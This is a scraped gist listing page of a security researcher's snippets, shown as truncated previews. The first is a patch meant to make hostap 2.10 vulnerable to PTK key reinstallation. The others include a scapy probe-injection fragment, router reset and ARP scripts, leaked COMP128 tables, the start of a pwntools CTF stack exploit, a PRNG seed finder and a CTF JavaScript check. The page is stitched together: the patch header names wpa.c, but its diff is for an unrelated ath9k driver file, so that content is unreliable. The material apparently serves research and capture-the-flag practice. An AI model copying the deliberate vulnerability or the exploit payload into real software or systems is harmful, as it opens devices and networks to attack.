Skip to content

Instantly share code, notes, and snippets.

@vanhoefm
vanhoefm / 0001-Make-hostap-vulnerable-to-PTK-key-reinstallation.patch
Created February 17, 2023 20:41
Make hostap 2.10 vulnerable to PTK key reinstallation
From b2393237de31be1799cb9026e30a5bf7b611f6e7 Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <[email protected]>
Date: Fri, 17 Feb 2023 21:38:06 +0100
Subject: [PATCH] Make hostap vulnerable to PTK key reinstallation
Apply this patch to hostap_2_10 to make it vulnerable to PTK key
reinstallations.
---
src/rsn_supp/wpa.c | 23 +++++++++++++++++++++++
1 file changed, 23 insertions(+)
diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_main.c b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
index d441045..84359c3 100644
--- a/drivers/net/wireless/ath/ath9k/htc_drv_main.c
+++ b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
@@ -147,21 +147,26 @@ static void ath9k_htc_bssid_iter(void *data, u8 *mac, struct ieee80211_vif *vif)
struct ath9k_vif_iter_data *iter_data = data;
int i;
- for (i = 0; i < ETH_ALEN; i++)
- iter_data->mask[i] &= ~(iter_data->hw_macaddr[i] ^ mac[i]);
#!/usr/bin/python
from scapy.all import *
import random
# number of times to inject probe for one bit (combat packet loss)
ATTEMPTS_PER_BIT = 3
# time to wait for ACK in seconds
SNIFFTIME = 0.1
@vanhoefm
vanhoefm / reset_router.py
Created June 21, 2020 01:25
Reset router using Selenium
#!/usr/bin/env python3
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
import subprocess, time
def reset_router(browser):
browser.execute_script('javascript:CheckHTMLStatus("System");')
time.sleep(0.13)
browser.execute_script('javascript:SetFactory_Default();')
time.sleep(0.01)
@vanhoefm
vanhoefm / wait_router.py
Last active June 21, 2020 01:18
Wait until the router booted
#!/usr/bin/env python3
from scapy.all import *
# MAC address of our own interface
MYMACADDR = "11:22:33:44:55:66"
def wait_router(iface, ip):
s = L2Socket(type=ETH_P_ALL, iface=iface)
arp = Ether(dst="ff:ff:ff:ff:ff:ff", src=MYMACADDR)
arp = arp/ARP(hwsrc=MYMACADDR, pdst=ip, psrc="192.168.0.100")
@vanhoefm
vanhoefm / comp128.c
Created February 5, 2016 23:30
Leaked comp128 algorithm (version 2 and 3) and a refactored, easier to understand, version.
/** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <time.h>
static uint8_t table0[] = {
197, 235, 60, 151, 98, 96, 3, 100, 248, 118, 42, 117, 172, 211, 181, 203,
@vanhoefm
vanhoefm / csaw-ctf-2015_exploit-500.py
Created September 21, 2015 02:24
Solution for exploiting 500 challenge of CSAW CTF 2015
#!/usr/bin/env python2
from pwn import *
# Stack layout of vulnerable functions:
#
# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#
payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
@vanhoefm
vanhoefm / findseed
Created March 23, 2015 00:33
Find PRNG seed
#include <stdio.h>
#include <stdint.h>
int is_correct(uint32_t seed) {
uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
for (uint32_t i = 0, x = seed; i < 5; ++i) {
x = (214013 * x + 2531011) & 0xFFFFFF;
if (hexkey[i] != (x >> 16)) return 0;
}
return 1;
@vanhoefm
vanhoefm / findseed
Created March 23, 2015 00:32
Find PRNG seed
#include <stdio.h>
#include <stdint.h>
int is_correct(uint32_t seed) {
uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
for (uint32_t i = 0, x = seed; i < 5; ++i) {
x = (214013 * x + 2531011) & 0xFFFFFF;
printf("%X\n", x);
if (hexkey[i] != (x >> 16)) return 0;
}
@vanhoefm
vanhoefm / good_crypto
Created March 22, 2015 17:49
Codegate 2015
function validate() {
var x = document.forms["formxx"]["pwz"].value;
if (!x.match(/^[A-Za-z]+$/))
return false;
if (!sha1(x).match(/^ff7b948953ac/))
return false;
alert("Flag: " + x);
return true;